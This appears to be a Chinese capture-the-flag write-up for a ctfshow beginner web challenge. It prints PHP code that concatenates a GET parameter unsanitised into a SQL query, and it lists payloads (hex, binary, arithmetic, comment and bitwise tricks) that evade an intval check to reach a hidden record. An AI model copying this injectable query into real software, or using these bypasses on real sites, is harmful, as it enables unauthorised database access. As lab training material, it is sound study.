题目介绍
ctfshow-萌新计划-web1-web7
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
题目分析
-
执行的sql为:
select * from article where id = 1 order by id limit 1
-
当id等于1000时,输出flag。
-
但是get提交的参数id 大于 999 直接退出并返回错误
-
id 小于 999 拼接sql语句,并执行
payload
?id=2*500
?id=500/0.5
?id=round(999.9)
?id=power(10,3)
?id=‘1000%’
?id=!!1000
?id=0x3E8
?id=/**/1000
?id=~~1000
?id=0000|1000
?id=0000%5E1000
?id=‘1000’
?id=0b1111101000
……
本地测评代码
<?php
if(isset($_GET['id'])){
$id = $_GET['id'];
if(intval($id) > 999){
echo "大于999,$id<br>";
$a = intval($id);
echo "大于999,$a<br>";
die("id error");
}else{
echo "小于999,$id<br>";
$a = intval($id);
echo "小于999,$a<br>";
}
}else{
highlight_file(__FILE__);
}
?>
此后如竟没有炬火,我便是唯一的光。